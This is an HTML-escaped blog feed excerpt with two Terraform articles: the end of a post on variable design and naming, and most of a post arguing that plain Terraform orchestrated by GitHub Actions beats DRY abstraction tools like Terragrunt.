  &lt;span class="nx"&gt;kibana_subdomain&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;coalesce&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;kibana&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;subdomain_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;module&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;environment&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Resources reference the locals&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"elasticsearch"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"${local.elasticsearch_subdomain}.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"CNAME"&lt;/span&gt;
  &lt;span class="nx"&gt;records&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_elasticsearch_domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;endpoint&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;ttl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;300&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_record"&lt;/span&gt; &lt;span class="s2"&gt;"kibana"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;zone_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;zone_id&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"${local.kibana_subdomain}.rosesecurity.dev"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"CNAME"&lt;/span&gt;
  &lt;span class="nx"&gt;records&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;aws_elasticsearch_domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;kibana_endpoint&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
  &lt;span class="nx"&gt;ttl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;300&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;coalesce()&lt;/code&gt; function returns the first non-null value, giving you:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Without user input&lt;/strong&gt; (in "prod" environment):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;code&gt;elasticsearch.prod.rosesecurity.dev&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;kibana.prod.rosesecurity.dev&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;With user override:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;elasticsearch&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;subdomain_name&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"search"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Results in: &lt;code&gt;search.prod.rosesecurity.dev&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let users configure only what matters, default the rest.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Group related variables into objects, use &lt;code&gt;optional()&lt;/code&gt; for flexibility, document with indented HEREDOCs, and combine with &lt;code&gt;coalesce()&lt;/code&gt; for intelligent defaults. Your module users will thank you.&lt;/p&gt;




&lt;h2&gt;
  
  
  Avoid Double Negatives in Variable Names
&lt;/h2&gt;

&lt;p&gt;Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ Negative variable name&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"disable_encryption"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Disable encryption"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket_server_side_encryption_configuration"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;disable_encryption&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_s3_bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;count&lt;/code&gt; line requires mental translation: "If &lt;code&gt;disable_encryption&lt;/code&gt; is &lt;code&gt;false&lt;/code&gt;, then &lt;code&gt;count&lt;/code&gt; is &lt;code&gt;1&lt;/code&gt;, so encryption is enabled." That's a double negative in what should be straightforward logic.&lt;/p&gt;

&lt;p&gt;This pattern creates real problems during code review. A change from &lt;code&gt;default = false&lt;/code&gt; to &lt;code&gt;default = true&lt;/code&gt; looks like it's "enabling" something when it's actually doing the opposite.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ Positive variable name&lt;/span&gt;
&lt;span class="nx"&gt;variable&lt;/span&gt; &lt;span class="s2"&gt;"encryption_enabled"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;description&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"Enable encryption"&lt;/span&gt;
  &lt;span class="nx"&gt;type&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;bool&lt;/span&gt;
  &lt;span class="nx"&gt;default&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"aws_s3_bucket_server_side_encryption_configuration"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;count&lt;/span&gt;  &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;var&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encryption_enabled&lt;/span&gt; &lt;span class="err"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
  &lt;span class="nx"&gt;bucket&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aws_s3_bucket&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;
  &lt;span class="c1"&gt;# ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The logic now reads directly: "If &lt;code&gt;encryption_enabled&lt;/code&gt; is &lt;code&gt;true&lt;/code&gt;, create the encryption config."&lt;/p&gt;

&lt;p&gt;Positive naming also makes security choices more explicit. Setting &lt;code&gt;encryption_enabled = false&lt;/code&gt; is visually clearer than &lt;code&gt;disable_encryption = true&lt;/code&gt;, even though they're functionally equivalent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Name variables for what they enable, not what they prevent.&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>iac</category>
      <category>infrastructure</category>
      <category>devops</category>
    </item>
    <item>
      <title>KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 19 Nov 2025 15:34:02 +0000</pubDate>
      <link>https://dev.to/rosesecurity/kiss-vs-dry-in-infrastructure-as-code-why-simple-often-beats-clever-foh</link>
      <guid>https://dev.to/rosesecurity/kiss-vs-dry-in-infrastructure-as-code-why-simple-often-beats-clever-foh</guid>
      <description>&lt;h2&gt;
  
  
  The Scale Gap Problem
&lt;/h2&gt;

&lt;p&gt;Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.&lt;/p&gt;

&lt;p&gt;Then you get to your actual production environment, and everything changes.&lt;/p&gt;

&lt;p&gt;You're not starting from scratch with a blank AWS account. You've got existing resources that were manually created two years ago by someone who left the company. There's brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what's actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.&lt;/p&gt;

&lt;p&gt;Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You're not just writing infrastructure code anymore. You're trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.&lt;/p&gt;

&lt;p&gt;This is the scale gap, and it's where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.&lt;/p&gt;

&lt;h2&gt;
  
  
  The DRY Revolution: Solving Yesterday's Problems
&lt;/h2&gt;

&lt;p&gt;When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don't Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.&lt;/p&gt;

&lt;p&gt;Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented "best practices," not necessarily because they had the specific problems these tools were designed to solve.&lt;/p&gt;

&lt;p&gt;The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.&lt;/p&gt;

&lt;p&gt;Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.&lt;/p&gt;
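
&lt;p&gt;For example, &lt;code&gt;for_each&lt;/code&gt; can collapse a stack of near-identical resource blocks into one (a minimal sketch; &lt;code&gt;var.zone_id&lt;/code&gt; and &lt;code&gt;var.endpoint&lt;/code&gt; are illustrative inputs, not part of the original post):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;variable "service_ports" {
  type    = map(number)
  default = { elasticsearch = 9200, kibana = 5601 }
}

# One resource block yields one record per map entry
resource "aws_route53_record" "service" {
  for_each = var.service_ports

  zone_id = var.zone_id    # illustrative input
  name    = "${each.key}.example.com"
  type    = "CNAME"
  ttl     = 300
  records = [var.endpoint] # illustrative input
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;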

&lt;p&gt;On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hidden Costs of Going DRY
&lt;/h2&gt;

&lt;h3&gt;
  
  
  When Abstractions Break, Troubleshooting Becomes Archaeological
&lt;/h3&gt;

&lt;p&gt;It's 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.&lt;/p&gt;

&lt;p&gt;With a DRY setup using Terragrunt and hierarchical inheritance, you're not just reading Terraform code. You're tracing values through multiple layers: the root &lt;code&gt;terragrunt.hcl&lt;/code&gt; with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.&lt;/p&gt;

&lt;p&gt;Where did that database configuration value actually come from? The global config? The environment override? A module default? You're playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.&lt;/p&gt;

&lt;p&gt;The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Onboarding Cliff
&lt;/h3&gt;

&lt;p&gt;It's a new team member's first day and they need to update a security group rule in the staging environment. Simple enough, right?&lt;/p&gt;

&lt;p&gt;With DRY abstraction tooling, they need to learn Terraform itself, your module library's conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.&lt;/p&gt;

&lt;p&gt;That's not onboarding, that's an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.&lt;/p&gt;

&lt;p&gt;Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.&lt;/p&gt;

&lt;h3&gt;
  
  
  Ecosystem Lock-in: The Hidden Technical Debt
&lt;/h3&gt;

&lt;p&gt;Once you've invested in a DRY abstraction framework, you're locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.&lt;/p&gt;

&lt;p&gt;Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool's limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.&lt;/p&gt;

&lt;p&gt;You've traded lines of code for organizational flexibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  The KISS Alternative: Orchestration in Pipelines, Simplicity in Code
&lt;/h2&gt;

&lt;p&gt;After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: &lt;strong&gt;pure Terraform with GitHub Actions orchestration&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;This isn't about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there's a simpler path that works better.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Core Insight: Complexity Can Only Be Relocated
&lt;/h3&gt;

&lt;p&gt;Orchestration complexity across environments cannot be eliminated. You can't wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.&lt;/p&gt;

&lt;p&gt;The question isn't "how do we eliminate complexity?" It's "where do we put the complexity to minimize time to business value?"&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DRY approach&lt;/strong&gt;: Complexity lives in abstraction tooling and configuration hierarchies&lt;br&gt;
&lt;strong&gt;KISS approach&lt;/strong&gt;: Complexity lives in CI/CD pipelines, where it's observable and debuggable&lt;/p&gt;

&lt;h3&gt;
  
  
  The Repo Structure: Nested and Navigable
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Key characteristics:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Break down by service (eks, mwaa, opensearch) or by logical grouping, depending on your needs&lt;/li&gt;
&lt;li&gt;Each service has its own state file, isolated blast radius&lt;/li&gt;
&lt;li&gt;Reusable modules in central directory&lt;/li&gt;
&lt;li&gt;No terraliths, no monolithic state files&lt;/li&gt;
&lt;li&gt;Completely navigable, you can grep for anything&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each service directory is a complete Terraform root module. Open &lt;code&gt;aws/us-east-1/prod/eks/&lt;/code&gt; and you see exactly what's deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.&lt;/p&gt;
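
&lt;p&gt;Concretely, each leaf directory tends to be little more than a thin call into a shared module (a sketch; the module path and input values are illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;# aws/us-east-1/prod/eks/main.tf -- the complete root module for this cluster
module "eks" {
  source = "../../../../modules/kubernetes"

  cluster_name    = "prod-us-east-1" # illustrative values
  cluster_version = "1.29"
  vpc_id          = var.vpc_id
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;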

&lt;h3&gt;
  
  
  Yes, Backend Configs Repeat (And That's Actually a Feature)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# aws/core-infrastructure/prod/backend.tf&lt;/span&gt;
&lt;span class="nx"&gt;terraform&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;backend&lt;/span&gt; &lt;span class="s2"&gt;"s3"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;bucket&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"myorg-terraform-state-prod"&lt;/span&gt;
    &lt;span class="nx"&gt;key&lt;/span&gt;            &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"core-infrastructure/terraform.tfstate"&lt;/span&gt;
    &lt;span class="nx"&gt;region&lt;/span&gt;         &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"us-east-1"&lt;/span&gt;
    &lt;span class="nx"&gt;encrypt&lt;/span&gt;        &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="nx"&gt;dynamodb_table&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"terraform-state-lock-prod"&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.&lt;/p&gt;

&lt;p&gt;When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don't need to trace through dynamic generation logic. Running &lt;code&gt;grep "myorg-terraform-state-prod"&lt;/code&gt; shows me every environment using that bucket instantly.&lt;/p&gt;

&lt;p&gt;The cost of repetition is about 100 lines of simple HCL across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.&lt;/p&gt;

&lt;h3&gt;
  
  
  Orchestration Lives in Pipelines
&lt;/h3&gt;

&lt;p&gt;This is where the magic happens, and where the orchestration complexity actually belongs.&lt;/p&gt;

&lt;p&gt;Home-grown GitHub Actions provide:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;For Pull Requests:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auto-detect which environments changed based on file paths&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;terraform plan&lt;/code&gt; for affected environments&lt;/li&gt;
&lt;li&gt;Post plan output as PR comment&lt;/li&gt;
&lt;li&gt;Run security/compliance checks&lt;/li&gt;
&lt;li&gt;Block merge on plan failures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;For Main Branch:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auto-detect environments to apply&lt;/li&gt;
&lt;li&gt;Run &lt;code&gt;terraform apply&lt;/code&gt; with approval gates&lt;/li&gt;
&lt;li&gt;Alert on failed applies&lt;/li&gt;
&lt;li&gt;Remediate orphaned resources&lt;/li&gt;
&lt;li&gt;Track drift and create tickets&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Scheduled:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Nightly drift detection across all environments&lt;/li&gt;
&lt;li&gt;Compare live state to code&lt;/li&gt;
&lt;li&gt;Alert on unexpected changes&lt;/li&gt;
&lt;/ul&gt;
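
&lt;p&gt;As a rough sketch of the pull-request side of this flow (the directory layout, job names, and filter paths here are illustrative, not the exact workflow I run, and credentials setup is omitted), the auto-detection and plan steps might look like:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# .github/workflows/terraform-plan.yml (illustrative sketch)
name: terraform-plan
on:
  pull_request:
    paths:
      - "aws/**"

jobs:
  plan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      # Detect which environment directories changed in this PR
      - id: envs
        run: |
          changed=$(git diff --name-only "origin/${{ github.base_ref }}..." \
            | grep '^aws/' | cut -d/ -f1-3 | sort -u | tr '\n' ' ')
          echo "changed=${changed}" &gt;&gt; "$GITHUB_OUTPUT"

      # Plan only the affected environments; a failed plan fails the check
      - run: |
          for dir in ${{ steps.envs.outputs.changed }}; do
            terraform -chdir="$dir" init -input=false
            terraform -chdir="$dir" plan -input=false -no-color
          done
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Posting the plan output as a PR comment and blocking the merge on failure are then ordinary branch-protection settings, not something the Terraform code itself has to know about.&lt;/p&gt;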

&lt;p&gt;The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that's invisible (which is exactly as it should be).&lt;/p&gt;

&lt;h2&gt;
  
  
  Addressing the Objections
&lt;/h2&gt;

&lt;h3&gt;
  
  
  "But You're Repeating Backend Configurations!"
&lt;/h3&gt;

&lt;p&gt;Yes. Intentionally.&lt;/p&gt;

&lt;p&gt;100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt's nuances. Which has a better ROI?&lt;/p&gt;

&lt;p&gt;Repetition creates greppability. When investigating state issues, &lt;code&gt;grep "bucket-name"&lt;/code&gt; immediately shows every environment. No tracing through dynamic generation. No "where did this value come from?"&lt;/p&gt;

&lt;p&gt;In infrastructure code, transparency trumps terseness every time.&lt;/p&gt;

&lt;h3&gt;
  
  
  "You Don't Have Hierarchical Inheritance!"
&lt;/h3&gt;

&lt;p&gt;Correct, and that's also intentional.&lt;/p&gt;

&lt;p&gt;Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you're debugging the inheritance chain instead of the infrastructure.&lt;/p&gt;

&lt;p&gt;Without inheritance, every value is explicit in the environment directory. New team members don't need to learn your inheritance model, they just read the config.&lt;/p&gt;

&lt;p&gt;The onboarding time saved pays for repeated config 100 times over.&lt;/p&gt;

&lt;h3&gt;
  
  
  "This Won't Scale!"
&lt;/h3&gt;

&lt;p&gt;It depends on what you mean by "scale."&lt;/p&gt;

&lt;p&gt;200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.&lt;/p&gt;

&lt;p&gt;The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?&lt;/p&gt;

&lt;p&gt;Most teams adopt DRY tooling as "best practice" before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use What: The Nuanced Reality
&lt;/h2&gt;

&lt;h3&gt;
  
  
  KISS Makes Sense When:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You have fewer than 500 environments&lt;/li&gt;
&lt;li&gt;Team size is small to medium (&amp;lt; 50 engineers)&lt;/li&gt;
&lt;li&gt;Change frequency is low (infrastructure mostly stable after initial deployment)&lt;/li&gt;
&lt;li&gt;Operational clarity is critical (regulated industries, high-stakes infrastructure)&lt;/li&gt;
&lt;li&gt;Team has varied experience levels (sysadmins, not primarily developers)&lt;/li&gt;
&lt;li&gt;Troubleshooting speed matters more than code elegance&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  DRY Tooling Makes Sense When:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You genuinely have massive scale (1000+ environments with interdependencies)&lt;/li&gt;
&lt;li&gt;Your team is primarily platform engineers comfortable with abstraction&lt;/li&gt;
&lt;li&gt;You have dedicated platform team maintaining the tooling&lt;/li&gt;
&lt;li&gt;Environment configurations have complex shared logic that changes frequently&lt;/li&gt;
&lt;li&gt;You're building infrastructure-as-a-product with many consumers&lt;/li&gt;
&lt;li&gt;Compliance requires enforced patterns across all deployments&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  The Real Question: What's Your Actual Cost Metric?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;If your cost metric is lines of code written&lt;/strong&gt;, choose DRY.&lt;br&gt;
&lt;strong&gt;If your cost metric is time to accomplish business goals&lt;/strong&gt;, choose KISS.&lt;/p&gt;

&lt;p&gt;Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how "clean" the code looks.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Anti-Pattern: Engineering for Engineering's Sake
&lt;/h2&gt;

&lt;p&gt;The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.&lt;/p&gt;

